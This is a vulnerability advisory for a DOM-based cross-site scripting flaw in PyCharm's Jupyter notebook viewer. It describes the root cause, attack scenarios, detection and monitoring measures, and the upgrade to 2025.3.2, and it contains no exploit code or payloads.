CVE-2026-25847 Overview
A DOM-based Cross-Site Scripting (XSS) vulnerability has been identified in JetBrains PyCharm versions prior to 2025.3.2. This security flaw exists within the Jupyter viewer page functionality, allowing attackers to potentially execute arbitrary JavaScript code in the context of a user's browser session when viewing malicious Jupyter notebooks.
Critical Impact
Exploitation of this DOM-based XSS vulnerability could allow attackers to steal sensitive session data, execute unauthorized actions on behalf of the user, or compromise the integrity of the development environment through crafted Jupyter notebook content.
Affected Products
- JetBrains PyCharm versions before 2025.3.2
- PyCharm Professional Edition with Jupyter notebook support
- PyCharm Community Edition with Jupyter viewer functionality
Discovery Timeline
- 2026-02-09 - CVE-2026-25847 published to NVD
- 2026-02-09 - Last updated in NVD database
Technical Details for CVE-2026-25847
Vulnerability Analysis
This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a DOM-based XSS variant. The flaw resides in PyCharm's Jupyter viewer component, which renders Jupyter notebook content without adequate sanitization of user-controlled data before inserting it into the Document Object Model.
DOM-based XSS differs from traditional reflected or stored XSS in that the vulnerability exists entirely on the client-side. The malicious payload is processed by JavaScript code running in the browser, modifying the DOM environment in an unsafe manner. In this case, when PyCharm renders a Jupyter notebook containing malicious content, the JavaScript execution context can be compromised.
The attack requires user interaction, as the victim must open or view a crafted Jupyter notebook file. However, given that developers frequently open notebooks from various sources including public repositories and shared projects, the attack surface is substantial in real-world development workflows.
Root Cause
The root cause stems from insufficient input validation and output encoding within PyCharm's Jupyter viewer rendering pipeline. When processing Jupyter notebook cells, particularly those containing HTML or Markdown content, the viewer fails to properly sanitize or escape potentially dangerous JavaScript constructs before they are rendered in the DOM.
Specifically, the Jupyter viewer appears to trust certain input fields within the notebook JSON structure, allowing script injection through cell outputs, metadata fields, or formatted content areas that support HTML rendering.
Attack Vector
The attack vector is network-based, requiring an attacker to craft a malicious Jupyter notebook file (.ipynb) and convince a victim to open it in PyCharm. Attack scenarios include:
- Supply Chain Attack: Embedding malicious content in a public Jupyter notebook repository
- Phishing: Sending crafted notebook files via email or collaboration platforms
- Compromised Project: Injecting malicious notebooks into shared development projects
The vulnerability exploits the trust relationship between the IDE and notebook content. When a developer opens the malicious notebook, the XSS payload executes within the PyCharm Jupyter viewer context, potentially accessing IDE session data, workspace information, or triggering further malicious actions.
The attack leverages improperly sanitized content within Jupyter notebook cells. When the PyCharm Jupyter viewer processes notebook data containing embedded script tags or JavaScript event handlers in cell outputs or metadata, the malicious code executes in the viewer's DOM context. Detailed technical information about the vulnerability can be found in the JetBrains Fixed Issues Overview.
Detection Methods for CVE-2026-25847
Indicators of Compromise
- Unexpected JavaScript execution when viewing Jupyter notebooks in PyCharm
- Suspicious network connections originating from the PyCharm process during notebook viewing
- Anomalous DOM modifications or script injections observed in Jupyter viewer components
- Presence of obfuscated JavaScript code within .ipynb file cell outputs or metadata
Detection Strategies
- Monitor file system access for .ipynb files from untrusted sources being opened in PyCharm
- Implement content security policies for embedded viewers that detect inline script execution attempts
- Deploy endpoint detection rules that flag unusual PyCharm process behavior during notebook operations
- Scan incoming Jupyter notebook files for suspicious HTML/JavaScript patterns before opening
Monitoring Recommendations
- Enable verbose logging for PyCharm's Jupyter integration components
- Monitor network traffic from development workstations for unexpected outbound connections during IDE usage
- Implement file integrity monitoring for workspace directories containing Jupyter notebooks
- Track PyCharm version information across the organization to identify unpatched installations
How to Mitigate CVE-2026-25847
Immediate Actions Required
- Upgrade JetBrains PyCharm to version 2025.3.2 or later immediately
- Audit any recently opened Jupyter notebooks from untrusted sources for suspicious content
- Review PyCharm's Jupyter viewer settings and disable automatic rendering of rich content where possible
- Implement organizational policies restricting the opening of notebooks from unverified sources
Patch Information
JetBrains has addressed this vulnerability in PyCharm version 2025.3.2. The fix implements proper sanitization of content rendered within the Jupyter viewer, preventing the execution of injected JavaScript code. Users should update to this version or later through the JetBrains Toolbox or by downloading directly from the official JetBrains website. For complete details on the security fix, refer to the JetBrains Fixed Issues Overview.
Workarounds
- Avoid opening Jupyter notebooks from untrusted or unknown sources until the patch is applied
- Use alternative Jupyter viewers (browser-based JupyterLab or Jupyter Notebook) for reviewing untrusted content
- Manually inspect .ipynb files in a text editor before opening them in PyCharm to check for suspicious JavaScript
- Implement network segmentation to limit potential impact if exploitation occurs on development workstations
# Verify PyCharm version and check for updates
# Navigate to Help > About in PyCharm to verify version is 2025.3.2 or later
# Or check via JetBrains Toolbox for available updates
# For organizations using silent deployment, update can be scripted:
# Download latest PyCharm from https://www.jetbrains.com/pycharm/download/
# Verify SHA-256 checksum against published values before deployment
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
